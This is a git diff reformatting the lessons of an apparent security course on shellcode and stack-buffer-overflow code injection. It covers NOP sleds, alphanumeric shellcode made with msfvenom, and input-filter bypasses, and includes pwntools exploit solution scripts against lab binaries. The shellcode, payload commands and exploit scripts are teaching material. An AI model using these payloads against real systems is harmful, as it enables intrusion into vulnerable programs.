`execve("/bin/sh", {"/bin/sh", NULL}, NULL)` on an `x86_64` platform we can call: @@ -204,90 +236,123 @@ For example, to obtain a shellcode which performs `execve("/bin/sh", {"/bin/sh", shellcraft.amd64.linux.sh() ``` -Note that this will give you back text representing *assembly code* and **not** *machine code* bytes. You can then use the `asm` function to assemble it: +Note that this will give you back text representing assembly code and **not** machine code bytes. +You can then use the `asm` function to assemble it: ```python asm(shellcraft.amd64.linux.sh(), arch="amd64", os="linux")) ``` -Remember the friendly features of pwntools! Instead of always specifying the OS and the architecture, we can set them in the global context, like this: + +Remember the friendly features of pwntools! +Instead of always specifying the OS and the architecture, we can set them in the global context, like this: ```python context.arch="amd64" context.os="linux" ``` -Or - even simpler - we can indicate a particular binary and let pwntools deduce the OS and architecture: `context.binary = "./vuln"`. We can then invoke a much cleaner `asm(shellcraft.sh())`. +Or - even simpler - we can indicate a particular binary and let pwntools deduce the OS and architecture: `context.binary = "./vuln"`. +We can then invoke a much cleaner `asm(shellcraft.sh())`. -Besides the magic snippet to invoke a shell, there are other builtin code fragments, such as to cause a crash, an infinite loop, `cat` a file or call some other syscall. Play around with `shellcraft`, inspecting the output. You'll notice that all these shellcodes are free of zero bytes and newlines! +Besides the magic snippet to invoke a shell, there are other builtin code fragments, such as to cause a crash, an infinite loop, `cat` a file or call some other syscall. +Play around with `shellcraft`, inspecting the output. +You'll notice that all these shellcodes are free of zero bytes and newlines! -## 05. Tutorial: alphanumeric shellcode +### 05. Tutorial: alphanumeric shellcode -It is commonly the case that user input is filtered to make sure it matches certain conditions. Most user input expected from a keyboard should not contain non-printable characters; a "name" should contain only letters, a PIN should contain only digits, etc. +It is commonly the case that user input is filtered to make sure it matches certain conditions. +Most user input expected from a keyboard should not contain non-printable characters; +a "name" should contain only letters, a PIN should contain only digits, etc. -The program might check its input against some conditions and, if rejected, bail in such a way so as to not trigger our injected code. This places the burden on us to develop shellcode that doesn't contain certain bytes. We've seen how we can avoid newlines and zero bytes to work around some input-reading functions. This concept can be pushed even further, heavily restricting our character set: on 32-bit platforms, we can write **alphanumeric shellcodes**! +The program might check its input against some conditions and, if rejected, bail in such a way so as to not trigger our injected code. +This places the burden on us to develop shellcode that doesn't contain certain bytes. +We've seen how we can avoid newlines and zero bytes to work around some input-reading functions. +This concept can be pushed even further, heavily restricting our character set: on 32-bit platforms, we can write **alphanumeric shellcodes**! -But can we really? It's plausible that there are some clever tricks on the level of replacing `mov eax, 0x3b` with `xor eax, eax; mov al, 0x3b` that could make use of only alphanumeric characters, but all our shellcodes so far need to perform a syscall. Looking at the encoding of the `int 0x80` instruction seems pretty grim: `\xcd\x80`. Those are not even printable characters. So how can we perform a syscall? +But can we really? +It's plausible that there are some clever tricks on the level of replacing `mov eax, 0x3b` with `xor eax, eax; mov al, 0x3b` that could make use of only alphanumeric characters, but all our shellcodes so far need to perform a syscall. +Looking at the encoding of the `int 0x80` instruction seems pretty grim: `\xcd\x80`. +Those are not even printable characters. +So how can we perform a syscall? Here it's important to step back and carefully consider our assumptions: - * There is some memory region to which we have both write and execute access (otherwise we wouldn't attempt a code injection attack) - * After our input is read, there is some check on it to make sure it doesn't contain certain characters. +- There is some memory region to which we have both write and execute access (otherwise we wouldn't attempt a code injection attack) +- After our input is read, there is some check on it to make sure it doesn't contain certain characters. -Aha! We cannot **inject** some bytes, but nothing's stopping us from injecting something that **generates** those bytes! Generating is just an alternative way of *writing*, so instead of **injecting** our shellcode, we'll inject some code which **generates** the shellcode, then executes it! +Aha! +We cannot **inject** some bytes, but nothing's stopping us from injecting something that **generates** those bytes! +Generating is just an alternative way of writing, so instead of **injecting** our shellcode, we'll inject some code which **generates** the shellcode, then executes it! -This is, in fact, as complicated as it sounds, so we won't do it ourselves. We'll just observe how such a shellcode, produced by a specialized tool (`msfvenom`) works. So invoke the following command, which should give you a python-syntax buffer containing an alphanumeric shellcode that executes "/bin/sh": +This is, in fact, as complicated as it sounds, so we won't do it ourselves. +We'll just observe how such a shellcode, produced by a specialized tool (`msfvenom`) works. +So invoke the following command, which should give you a python-syntax buffer containing an alphanumeric shellcode that executes "/bin/sh": `msfvenom -a x86 --platform linux -p linux/x86/exec -e x86/alpha_mixed BufferRegister=ECX -f python` - * `-a x86`: specifies the architecture as 32-bit x86 - * `--platform linux`: specifies OS - * `-p linux/x86/exec`: specifies a preset program (you can use `-` or `STDIN` for a custom initial shellcode, to be transformed) - * `-e x86/alpha_mixed`: specifies encoding to be alphanumeric - * `BufferRegister=ECX`: specifies an initial register which holds the address of the buffer; this is needed in order to have some way to refer to the region in which we're unpacking our code. Without this, a short non-alphanumeric preamble is added instead to automatically extract the buffer address - * `-f python`: formats output using python syntax +- `-a x86`: specifies the architecture as 32-bit x86 +- `--platform linux`: specifies OS +- `-p linux/x86/exec`: specifies a preset program (you can use `-` or `stdin` for a custom initial shellcode, to be transformed) +- `-e x86/alpha_mixed`: specifies encoding to be alphanumeric +- `BufferRegister=ECX`: specifies an initial register which holds the address of the buffer; +this is needed in order to have some way to refer to the region in which we're unpacking our code. +Without this, a short non-alphanumeric preamble is added instead to automatically extract the buffer address +- `-f python`: formats output using python syntax `msfvenom` is actually capable of taking an arbitrary assembly snippet and transforming it into an alphanumeric "bootstrapper" which, once injected, unpacks the original shellcode and executes it. -# Challenges +## Challenges -## 06. Challenge: NOP sled redo +### 06. Challenge: NOP-sled Redo -Redo the last three challenges (9, 10, 11) from [the previous session](../shellcodes) using NOP-sleds. +Redo the last three challenges (9, 10, 11) from [the "Shellcodes" session](../../shellcodes/reading) using NOP-sleds. -## 07. Challenge: No NOPs allowed! +### 07. Challenge: No NOPs Allowed -This is similar to the previous tasks: you are left to guess a stack address. However, the `\x90` byte is filtered from input so you cannot use a NOP sled. But you should be able to adapt the concept. Remember the relevant features of the "NOP" instruction! +This is similar to the previous tasks: you are left to guess a stack address. +However, the `\x90` byte is filtered from input so you cannot use a NOP sled. +But you should be able to adapt the concept. +Remember the relevant features of the "NOP" instruction! -## 08. Challenge: multiline output +### 08. Challenge: Multiline Output -While perfectly ok with the byte 0, some functions (e.g. `fgets`) will stop reading when they encounter a newline character (`\n`). Thus, if our input is read by such a function, we need to make sure our shellcode contains no `\n` bytes. +While perfectly ok with the byte 0, some functions (e.g. +`fgets`) will stop reading when they encounter a newline character (`\n`). +Thus, if our input is read by such a function, we need to make sure our shellcode contains no `\n` bytes. For this challenge, the input will be read using the `gets` function, but you will need to craft a shellcode which prints to `stdout` the exact string: -``` +```text first second third ``` -## 09: Challenge: `execve` blocking attempt +### 09: Challenge: `execve` blocking attempt -If shellcodes are such a powerful threat, what if we attempted to block some shellcode-sepcific characters? Such as the bytes that encode a `syscall` function. Or the slash needed in a path; maybe it's not such a big loss to avoid these in legitimate inputs. +If shellcodes are such a powerful threat, what if we attempted to block some shellcode-sepcific characters? +Such as the bytes that encode a `syscall` function. +Or the slash needed in a path; +maybe it's not such a big loss to avoid these in legitimate inputs. -Can you still get a shell? For this task, **don't use** an existing encoder, but rather apply the encoding principles yourself. +Can you still get a shell? +For this task, **don't use** an existing encoder, but rather apply the encoding principles yourself. -# Further Reading +## Further Reading -["Smashing The Stack For Fun And Profit", Aleph One](http://phrack.org/issues/49/14.html) - a legendary attack paper documenting SBOs and shellcodes. As it is written in '96, the examples in it will probably _not_ work (either out-of-the-box or with some tweaks). We recommend perusing it for its historical/cultural significance, but don't waste much time on the technical details of the examples. +["Smashing The Stack For Fun And Profit", Aleph One](http://phrack.org/issues/49/14.html) - a legendary attack paper documenting SBOs and shellcodes. +As it is written in '96, the examples in it will probably **not** work (either out-of-the-box or with some tweaks). +We recommend perusing it for its historical/cultural significance, but don't waste much time on the technical details of the examples. -## Input restrictions +### Input restrictions -The following articles deal with restrictions on the shellcode structure, such as forbidden characters or statistical properties of the input string. The examples presented will most likely not work as-they-are in a modern environment, so don't focus on the technical details, but rather on the methodology presented. +The following articles deal with restrictions on the shellcode structure, such as forbidden characters or statistical properties of the input string. +The examples presented will most likely not work as-they-are in a modern environment, so don't focus on the technical details, but rather on the methodology presented. [*Writing ia32 alphanumeric shellcodes*, 2001 - rix](http://phrack.org/issues/57/15.html) - probably the first comprehensive presentation of how to automatically convert generic shellcodes to alphanumeric ones. -[*Building IA32 'Unicode-Proof' Shellcodes*, 2003 - obscou](http://phrack.org/issues/61/11.html) - rather than being concerned with input *restrictions*, this addresses ulterior transformations on input, namely converting an ASCII string to a UTF-16 one (as mentioned in the article's introduction, you could also imagine other possible transformations, such as case normalization). +[*Building IA32 'Unicode-Proof' Shellcodes*, 2003 - obscou](http://phrack.org/issues/61/11.html) - rather than being concerned with input restrictions, this addresses ulterior transformations on input, namely converting an ASCII string to a UTF-16 one (as mentioned in the article's introduction, you could also imagine other possible transformations, such as case normalization). [*Writing UTF-8 compatible shellcodes*, 2004 - Wana](http://phrack.org/issues/62/9.html) -[*English shellcode*, 2009 - Mason, Small, Monrose, MacManus](https://www.cs.jhu.edu/~sam/ccs243-mason.pdf) - delves into automatically generating shellcode which has the same statistical properties as English text. +[*English shellcode*, 2009 - Mason, Small, Monrose, MacManus](https://www.cs.jhu.edu/~sam/ccs243-mason.pdf) delves into automatically generating shellcode which has the same statistical properties as English text. diff --git a/chapters/exploitation-techniques/shellcodes/drills/04-tutorial-hello-world-shellcode/src/exploit.py b/chapters/exploitation-techniques/shellcodes/drills/04-tutorial-hello-world-shellcode/src/exploit.py index f3ced20..57d6f66 100755 --- a/chapters/exploitation-techniques/shellcodes/drills/04-tutorial-hello-world-shellcode/src/exploit.py +++ b/chapters/exploitation-techniques/shellcodes/drills/04-tutorial-hello-world-shellcode/src/exploit.py @@ -19,10 +19,10 @@ # First part: inject payload = b"" payload += shellcode -payload += (128 - len(shellcode)) * b'A' +payload += (128 - len(shellcode)) * b"A" # Second part: trigger -payload += (buf_offset + 8) * b'A' # + 8 for the saved rbp +payload += (buf_offset + 8) * b"A" # + 8 for the saved rbp payload += pack(machine_code_addr) io = process(BIN) diff --git a/chapters/exploitation-techniques/shellcodes/drills/07-challenge-shellcode-on-stack/sol/exploit.py b/chapters/exploitation-techniques/shellcodes/drills/07-challenge-shellcode-on-stack/sol/exploit.py index 51f302b..cb9591f 100755 --- a/chapters/exploitation-techniques/shellcodes/drills/07-challenge-shellcode-on-stack/sol/exploit.py +++ b/chapters/exploitation-techniques/shellcodes/drills/07-challenge-shellcode-on-stack/sol/exploit.py @@ -18,7 +18,7 @@ # Inject and trigger payload = b"" payload += shellcode -payload += (offset + 8 - len(shellcode)) * b'A' +payload += (offset + 8 - len(shellcode)) * b"A" payload += pack(addr) io.send(payload) diff --git a/chapters/exploitation-techniques/shellcodes/drills/08-challenge-shellcode-after/sol/exploit.py b/chapters/exploitation-techniques/shellcodes/drills/08-challenge-shellcode-after/sol/exploit.py index 947ddc9..7823f3a 100755 --- a/chapters/exploitation-techniques/shellcodes/drills/08-challenge-shellcode-after/sol/exploit.py +++ b/chapters/exploitation-techniques/shellcodes/drills/08-challenge-shellcode-after/sol/exploit.py @@ -17,7 +17,7 @@ # Inject and trigger payload = b"" -payload += (offset + 8) * b'A' +payload += (offset + 8) * b"A" payload += pack(addr + offset + 16) payload += shellcode diff --git a/chapters/exploitation-techniques/shellcodes/drills/10-challenge-shellcode-argv/sol/exploit.py b/chapters/exploitation-techniques/shellcodes/drills/10-challenge-shellcode-argv/sol/exploit.py index 1ca7c3b..d960713 100755 --- a/chapters/exploitation-techniques/shellcodes/drills/10-challenge-shellcode-argv/sol/exploit.py +++ b/chapters/exploitation-techniques/shellcodes/drills/10-challenge-shellcode-argv/sol/exploit.py @@ -10,7 +10,7 @@ offset = 0x4 # From gdb -arg_addr = 0x7fffffffd9dd +arg_addr = 0x7FFFFFFFD9DD shellcode = asm(shellcraft.sh()) @@ -18,7 +18,7 @@ for diff in range(-128, 128): # Simple control flow hijacking payload = b"" - payload += (offset + 8) * b'A' + payload += (offset + 8) * b"A" payload += pack(arg_addr + diff) io = process([BIN, shellcode]) diff --git a/chapters/exploitation-techniques/shellcodes/drills/11-challenge-shellcode-env/sol/exploit.py b/chapters/exploitation-techniques/shellcodes/drills/11-challenge-shellcode-env/sol/exploit.py index b23f269..aead0e0 100755 --- a/chapters/exploitation-techniques/shellcodes/drills/11-challenge-shellcode-env/sol/exploit.py +++ b/chapters/exploitation-techniques/shellcodes/drills/11-challenge-shellcode-env/sol/exploit.py @@ -10,7 +10,7 @@ offset = 0x4 # From gdb -env_addr = 0x7fffffffd9dd +env_addr = 0x7FFFFFFFD9DD shellcode = asm(shellcraft.sh()) @@ -18,7 +18,7 @@ for diff in range(-128, 128): # Simple control flow hijacking payload = b"" - payload += (offset + 8) * b'A' + payload += (offset + 8) * b"A" payload += pack(env_addr + diff) io = process(BIN, env={"SHELLCODE": shellcode}) diff --git a/chapters/exploitation-techniques/shellcodes/reading/README.md b/chapters/exploitation-techniques/shellcodes/reading/README.md index f532fbe..805a541 100644 --- a/chapters/exploitation-techniques/shellcodes/reading/README.md +++ b/chapters/exploitation-techniques/shellcodes/reading/README.md @@ -1,74 +1,59 @@ ---- -linkTitle: Shellcodes -type: docs -weight: 10 ---- +# Shellcodes -
- Table of contents - - * [Introduction](#introduction) - * [Stack-buffer-overflow recap](#stack-buffer-overflow-recap) - * [Code injection](#code-injection) - * [Develop](#develop) - * [Inject](#inject) - * [Trigger](#trigger) - * ["Shellcodes"](#shellcodes) - * [Tutorials](#tutorials) - * [01. Tutorial: generating machine code](#01-tutorial-generating-machine-code) - * [02. Tutorial: inspecting machine code](#02-tutorial-inspecting-machine-code) - * [03. Tutorial: feeding machine code to a program](#03-tutorial-feeding-machine-code-to-a-program) - * [04. Tutorial: "Hello, world!" shellcode](#04-tutorial-hello-world-shellcode) - * [05. Tutorial: Debugging shellcodes](#05-tutorial-debugging-shellcodes) - * [Challenges](#challenges) - * [06. Challenge: /bin/sh shellcode](#06-challenge-binsh-shellcode) - * [07. Challenge: shellcode on stack](#07-challenge-shellcode-on-stack) - * [08. Challenge: shellcode after saved ret](#08-challenge-shellcode-after-saved-ret) - * [09. Challenge: shellcode after saved ret - no leak](#09-challenge-shellcode-after-saved-ret---no-leak) - * [10. Challenge: shellcode as command line arg](#10-challenge-shellcode-as-command-line-arg) - * [11. Challenge: shellcode in the environment](#11-challenge-shellcode-in-the-environment) - * [Further Reading](#further-reading) - * [Resources](#resources) +## Introduction -
+### Stack Buffer Overflow Recap -# Introduction +In the last session, we studied what an attacker can do to a program with a stack-buffer-overflow vulnerability: fill up the legitimately reserved space with junk, then overwrite the saved-return value with an address of their choosing. +After the vulnerable function's execution ends, its final `ret` will place the attacker's chosen address into the `eip`/`rip` and execution will continue from there. -## Stack-buffer-overflow recap +![Stack Buffer](../media/stack_buffer.png) -In the last session, we studied what an attacker can do to a program with a stack-buffer-overflow vulnerability: fill up the legitimately reserved space with junk, then overwrite the saved-return value with an address of their choosing. After the vulnerable function's execution ends, its final `ret` will place the attacker's chosen address into the `eip`/`rip` and execution will continue from there. +The above scenario limits the attacker to the functionality already present in the vulnerable program. +If an attacker desires to spawn a shell, but no shell-spawning code is already present - tough luck! +In this session we will start studying a method of overcoming this limitation: code injection. - +### Code Injection -The above scenario limits the attacker to the functionality already present in the vulnerable program. If an attacker desires to spawn a shell, but no shell-spawning code is already present - tough luck! In this session we will start studying a method of overcoming this limitation: code injection. +If the code we want to execute is not present in the target program, we'll simply add it ourselves! +We will implement our desired functionality in machine code, inject (which is just a fancy word for "write") it into the target process' memory, then force execution to jump to the beginning of our code. +These steps can be succinctly summarized as: develop, inject, trigger. -## Code injection +#### Develop -If the code we want to execute is not present in the target program, we'll simply add it ourselves! We will implement our desired functionality in machine code, inject (which is just a fancy word for "write") it into the target process' memory, then force execution to jump to the beginning of our code. These steps can be succinctly summarized as: develop, inject, trigger. +First, we need to implement our desired functionality. +Our goal is to obtain _something_ that can be placed directly into the memory space of a running process and be executed; +so it cannot be text representing code in C, Python, Java etc. +It must be _machine code_. +This might seem a very difficult task, but we'll simply use the tools we usually employ when writing code that we intend to run; +in particular, we will rely on the assembler: we write ASM code to do what we want, then assemble it to obtain a string of machine code bytes. -### Develop +#### Inject -First, we need to implement our desired functionality. Our goal is to obtain _something_ that can be placed directly into the memory space of a running process and be executed; so it cannot be text representing code in C, Python, Java etc. It must be _machine code_. This might seem a very difficult task, but we'll simply use the tools we usually employ when writing code that we intend to run; in particular, we will rely on the assembler: we write ASM code to do what we want, then assemble it to obtain a string of machine code bytes. +Once we have our string of machine code bytes, we need it to be present in the memory space of the target process. +This means the program must read some input (with a `gets`, `fgets`, `fscanf`, `read` etc.). +However, if we can _launch_ the program, we can also place our code in the environment or inside a command line argument; +even if a program doesn't use these, the loader still places them in its address space. -### Inject +#### Trigger -Once we have our string of machine code bytes, we need it to be present in the memory space of the target process. This means the program must read some input (with a `gets`, `fgets`, `fscanf`, `read` etc.). However, if we can _launch_ the program, we can also place our code in the environment or inside a command line argument; even if a program doesn't use these, the loader still places them in its address space. +After having placed our code inside the memory space of the target process, we need to force execution to jump at its beginning. +We already know how to do this, by means of a stack-buffer-overflow, which we studied in the previous session. -### Trigger +### "Shellcodes" -After having placed our code inside the memory space of the target process, we need to force execution to jump at its beginning. We already know how to do this, by means of a stack-buffer-overflow, which we studied in the previous session. +Usually, the end-goal of an attacker is to force the program to spawn a shell, thus gaining unlimited access. +This can be achieved by injecting machine code that triggers an `execve("/bin/sh", ["/bin/sh", NULL], NULL)` system call, hence the name "shellcode". +However, this label is also used for any piece of injected code, even if it does not spawn a shell. -## "Shellcodes" +## Tutorials -Usually, the end-goal of an attacker is to force the program to spawn a shell, thus gaining unlimited access. This can be achieved by injecting machine code that triggers an `execve("/bin/sh", ["/bin/sh", NULL], NULL)` system call, hence the name "shellcode". However, this label is also used for any piece of injected code, even if it does not spawn a shell. +### 01. Tutorial: Generating Machine Code -# Tutorials +To address the first step of our code injection technique, we will start with a simple example: we want to force the program to end cleanly with an exit code of 42; +more precisely we want to execute an `exit(42)` system call. -## 01. Tutorial: generating machine code - -To address the first step of our code injection technique, we will start with a simple example: we want to force the program to end cleanly with an exit code of 42; more precisely we want to execute an `exit(42)` system call. - -```nasm +```asm BITS 64 mov rdi, 42 mov rax, 60 @@ -79,38 +64,41 @@ BITS 64 We can then use `nasm` to obtain a file with machine code: -``` -$ nasm exit_shellcode.nasm -o exit_shellcode.bin +```console +nasm exit_shellcode.nasm -o exit_shellcode.bin ``` **NOTE:** `exit_shellcode.bin` is not an ELF: -``` +```console $ file exit_shellcode.bin exit_shellcode.bin: data ``` -It is not an executable file at all, but simply contains a raw string of machine code bytes. You can see that it is very, very small: +It is not an executable file at all, but simply contains a raw string of machine code bytes. +You can see that it is very, very small: -``` +```console $ wc --bytes exit_shellcode.bin 12 exit_shellcode.bin ``` -## 02. Tutorial: inspecting machine code +### 02. Tutorial: Inspecting Machine Code -We would also like to be able to do the reverse of this: given a file that contains a raw string of machine code bytes, translate it back into readable assembly. This is useful to check that our assembly process was correct, as well as for analyzing files that we did not create. +We would also like to be able to do the reverse of this: given a file that contains a raw string of machine code bytes, translate it back into readable assembly. +This is useful to check that our assembly process was correct, as well as for analyzing files that we did not create. -In [the first session](../exploration-tools), we learned to disassemble using `objdump`. By default, `objdump` expects a proper `ELF` executable and complains about our raw file: +In [the first session](../../../binary-analysis/exploration-tools/reading), we learned to disassemble using `objdump`. +By default, `objdump` expects a proper `ELF` executable and complains about our raw file: -``` +```console $ objdump -d -M intel exit_shellcode.bin objdump: exit_shellcode.bin: file format not recognized ``` We need to use the following command: -``` +```console $ objdump -D -b binary -m i386:x86-64 -M intel exit_shellcode.bin test.bin: file format binary @@ -125,74 +113,77 @@ Disassembly of section .data: 11: 0f 05 syscall ``` -* `-D`: disassemble all, not only text/code zones. In our case this means disassemble the whole file. -* `-b binary`: treat the file as not having a specific object/executable format (such as ELF, COFF, Mach-O or PE). -* `-m i386:86-64`: the machine code inside the binary file is i386 (x86), 64 bits (usually, `objdump` gets this information from the ELF header). -* `-M intel`: display ASM using Intel assembly syntax, as opposed to AT&T assembly syntax. +- `-D`: disassemble all, not only text/code zones. +In our case this means disassemble the whole file. +- `-b binary`: treat the file as not having a specific object/executable format (such as ELF, COFF, Mach-O or PE). +- `-m i386:86-64`: the machine code inside the binary file is i386 (x86), 64 bits (usually, `objdump` gets this information from the ELF header). +- `-M intel`: display ASM using Intel assembly syntax, as opposed to AT&T assembly syntax. We can also use a tool like `xxd` or `hexdump` to inspect the byte values in the file, without disassembling: -``` +```console $ xxd exit_shellcode.bin 00000000: 48c7 c0ff ffff ffbf 2a00 0000 b83c 0000 H.......*....<.. 00000010: 000f 05 ... ``` -## 03. Tutorial: feeding machine code to a program +### 03. Tutorial: Feeding Machine Code to a Program -Now that we know how to obtain a bytestring of machine code from an assembly program, it's time to move on to the next step: injection. The simplest way is to redirect the `stdin` of the target program to the file containing our raw machine code. +Now that we know how to obtain a bytestring of machine code from an assembly program, it's time to move on to the next step: injection. +The simplest way is to redirect the `stdin` of the target program to the file containing our raw machine code. -``` -$ ./vuln < exit_shellcode.bin +```console +./vuln < exit_shellcode.bin ``` -However, we might want to freely edit the payload directly on the command line (for example, if the program reads some other stuff). The way to do this is to use another tool, like the shell itself, to transform hexadecimal notation into binary data: +However, we might want to freely edit the payload directly on the command line (for example, if the program reads some other stuff). +The way to do this is to use another tool, like the shell itself, to transform hexadecimal notation into binary data: -``` +```console $ printf '\x4b\x80\x04\x08' K� ``` Again, we can use a tool like `xxd` for the reverse operation, to verify that the binary data comes out as intended: -``` +```console $ printf '\x4b\x80\x04\x08' | xxd -p 4b800408 ``` If our machine code is contained in a file, we can use `hexdump` to obtain an escaped hexadecimal representation of its contents: -``` +```console $ hexdump -v -e '"\\" 1/1 "x%02x"' exit_shellcode.bin \x48\xc7\xc0\xff\xff\xff\xff\xbf\x2a\x00\x00\x00\xb8\x3c\x00\x00\x00\x0f\x05 ``` Which we can then combine with some other input -``` -$ printf '1\x48\xc7\xc0\xff\xff\xff\xff\xbf\x2a\x00\x00\x00\xb8\x3c\x00\x00\x00\x0f\x05' | ./vuln2 +```console +printf '1\x48\xc7\xc0\xff\xff\xff\xff\xbf\x2a\x00\x00\x00\xb8\x3c\x00\x00\x00\x0f\x05' | ./vuln2 ``` Or we can do this directly: -``` -$ printf '1'$(hexdump -v -e '"\\" 1/1 "x%02x"' exit_shellcode.bin) | ./vuln2 +```console +printf '1'$(hexdump -v -e '"\\" 1/1 "x%02x"' exit_shellcode.bin) | ./vuln2 ``` We can then verify that the program did indeed exit with code 42: -``` +```console $ echo $? 42 ``` -## 04. Tutorial: "Hello, world!" shellcode +### 04. Tutorial: "Hello, world!" Shellcode -Our aim now is to develop a shellcode that prints `"Hello, world!\n"` to stdout, then inject it into `vuln` and trigger its execution. +Our aim now is to develop a shellcode that prints `"Hello, world!\n"` to standard output, then inject it into `vuln` and trigger its execution. We start by writing a shellcode that does a `write(1, "Hello, world!\n", 14)` system call, by writing the string on to the stack such that the stack pointer points to the beginning of the string. -```nasm +```asm ; Write "Hello, world!\n" to the standard output. BITS 64 ; We can't push 64 bit constants, but we can push 64 bit registers. @@ -211,18 +202,20 @@ This is just one way to do it and there are other possible approaches to it. We then assemble our snippet to get a string of machine code bytes (the `Makefile` provided already does this). -``` -$ nasm hello_shellcode.nasm -o hello_shellcode.bin +```console +nasm hello_shellcode.nasm -o hello_shellcode.bin ``` Our vulnerable program first reads 128 bytes into a global buffer (line 8): + ```c read(0, machine_code, 128); ``` -Our shellcode-injecting payload needs to consist of the shellcode itself and some junk to pad the payload length to 128. First, we need to determine the shellcode size in bytes, then we use a tool like python to generate the string: +Our shellcode-injecting payload needs to consist of the shellcode itself and some junk to pad the payload length to 128. +First, we need to determine the shellcode size in bytes, then we use a tool like python to generate the string: -``` +```console $ wc -c hello_shellcode.bin 42 hello_shellcode.bin @@ -237,9 +230,10 @@ char buf[16]; read(0, buf, 128); ``` -All we need to do is to pad the legitimately reserved space until the saved return address, then overwrite it with the address of `machine_code`. Thus we will probably need 16 + 8 (the saved `rbp`) bytes of padding, but remember that we can't rely on the layout we see in C and must inspect the binary: +All we need to do is to pad the legitimately reserved space until the saved return address, then overwrite it with the address of `machine_code`. +Thus we will probably need 16 + 8 (the saved `rbp`) bytes of padding, but remember that we can't rely on the layout we see in C and must inspect the binary: -``` +```console $ objdump -d -M intel ./vuln ... 0000000000401126
: @@ -251,7 +245,7 @@ $ objdump -d -M intel ./vuln We then determine the address of the global buffer which holds our code and craft our second payload (remember to reverse the bytes because our systems are little endian): -``` +```console $ nm ./vuln | grep machine_code 0000000000404060 T machine_code @@ -260,29 +254,31 @@ $ perl -e 'print "A" x (16 + 8) . "\x60\x40\x40\x00\x00\x00\x00\x00"' Now all we need to do is concatenate our two payloads: -``` +```console $ perl -e "print \"$(hexdump -v -e '"\\" 1/1 "x%02x"' ./hello_shellcode.bin)\" . \"A\" x (128 - 42) . \"A\" x (16 + 8) . \"\x60\x40\x40\x00\x00\x00\x00\x00\"" | ./vuln Hello, world! [1] 53760 done perl -e | 53762 segmentation fault (core dumped) ./vuln ``` -As you can see, even with simple exploits, payloads quickly become unwieldy. Our advice is to make use of a script in a language like python. There is one such script example in the task directory. +As you can see, even with simple exploits, payloads quickly become unwieldy. +Our advice is to make use of a script in a language like python. +There is one such script example in the task directory. -Even though we succeeded in printing our message, the program then ended abruptly with a _Segmentation fault_. Pause for a second to figure out why that is. +Even though we succeeded in printing our message, the program then ended abruptly with a "Segmentation fault" message. +Pause for a second to figure out why that is. -
- Answer here +Because we hijacked normal control flow, the program does not reach the end of the `main` function to terminate gracefully, but instead continues to attempt to execute instructions from the `machine_code` global var. +We can help the program exit gracefully by extending our shellcode to also perform an `exit(0)` syscall after the `write`. +Remember to check the size of the new shellcode and update the padding accordingly! - Because we hijacked normal control flow, the program does not reach the end of the `main` function to terminate gracefully, but instead continues to attempt to execute instructions from the `machine_code` global var. We can help the program exit gracefully by extending our shellcode to also perform an `exit(0)` syscall after the `write`. Remember to check the size of the new shellcode and update the padding accordingly! +### 05. Tutorial: Debugging Shellcodes -
+How can we **know** that our shellcode worked properly? +Sometimes its external effects are not immediately visible; +if it involves any system calls, we can make use of `strace`: -## 05. Tutorial: Debugging shellcodes - -How can we **know** that our shellcode worked properly? Sometimes its external effects are not immediately visible; if it involves any system calls, we can make use of `strace`: - -``` +```console $ printf '1'$(hexdump -v -e '"\\" 1/1 "x%02x"' exit_shellcode.bin) | strace ./vuln2 execve("./vuln2", ["./vuln2"], 0x7ffdb027a9d0 /* 77 vars */) = 0 .... @@ -290,12 +286,10 @@ exit(42) = ? +++ exited with 42 +++ ``` -A more productive approach is to use `gdb` to inspect the execution of the shellcode step by step. Load the program, break on the shellcode address, feed it the input and run: +A more productive approach is to use `gdb` to inspect the execution of the shellcode step by step. +Load the program, break on the shellcode address, feed it the input and run: -
- GDB output - -``` +```console $ gdb ./vuln Reading symbols from ./vuln... gdb-peda$ b *main+56 @@ -386,29 +380,32 @@ EFLAGS: 0x207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow) Legend: code, data, rodata, value 0x0000000000404060 in machine_code () gdb-peda$ - ``` -
-# Challenges +## Challenges -## 06. Challenge: /bin/sh shellcode +### 06. Challenge: /bin/sh Shellcode -You are given a piece of assembly code that attempts to spawn a shell with the aid of the `execve` syscall. However, the given code is buggy and it will not work. Your task is to figure out what's wrong with it and fix it. +You are given a piece of assembly code that attempts to spawn a shell with the aid of the `execve` syscall. +However, the given code is buggy and it will not work. +Your task is to figure out what's wrong with it and fix it. -## 07. Challenge: shellcode on stack +### 07. Challenge: Shellcode on Stack -Up until now we have injected code into some memory area, then used a stack-buffer-overflow vulnerability to overwrite a saved return address and hijack control flow. If we think about it, the legitimately reserved buffer space on the stack _is_ a memory area and we could perform our attack using a single read: the overflowing one. +Up until now we have injected code into some memory area, then used a stack-buffer-overflow vulnerability to overwrite a saved return address and hijack control flow. +If we think about it, the legitimately reserved buffer space on the stack _is_ a memory area and we could perform our attack using a single read: the overflowing one. So our payload will consist of the bytes in our shellcode, then some junk to pad the rest of the space to the saved return, then the address of the buffer itself: - - -Now that our shellcode is written on the stack, things become a little harder. Due to several factors (such as the fact that environment variables and command line arguments are placed by the loader on the stack), it is difficult to predict the address at which any value will be placed on the stack. For now, the binary will generously print it for us. +![Shellcode on Stack](../media/shellcode_below.png) + +Now that our shellcode is written on the stack, things become a little harder. +Due to several factors (such as the fact that environment variables and command line arguments are placed by the loader on the stack), it is difficult to predict the address at which any value will be placed on the stack. +For now, the binary will generously print it for us. You can observe the volatility of the stack by changing how you launch the program (rember that the path of the binary is considered a command line argument, namely `argv[0]` so it too gets placed on the stack, thus things change depending on what exact relative or absolute path we use): -``` +```console $ ./vuln 0x7fffffffd5d0 $ ../07-challenge-shellcode-on-stack/vuln @@ -425,39 +422,51 @@ $ FOO=bar ./vuln 0x7fffffffd5c0 ``` -## 08. Challenge: shellcode after saved ret +### 08. Challenge: Shellcode after Saved Return Address -In the previous challenge, we placed our shellcode on the stack, in the space between the overflown buffer's beginning and the saved return address. However, we could switch things up and place the shellcode in the area _after_ the saved return address. This might be useful when the stack buffer is too short to hold our payload. +In the previous challenge, we placed our shellcode on the stack, in the space between the overflown buffer's beginning and the saved return address. +However, we could switch things up and place the shellcode in the area **after** the saved return address. +This might be useful when the stack buffer is too short to hold our payload. So our payload will consist of padding junk from the beginning of the buffer to the saved return, the address of the next stack portion, then the bytes of our shellcode. - +![Shellcode Above](../media/shellcode_above.png) -To recap: given a stack-buffer-overflow vulnerability we can not only hijack control flow, but also place a shellcode on the stack using the buggy read. There are two regions where we can do this: +To recap: given a stack-buffer-overflow vulnerability we can not only hijack control 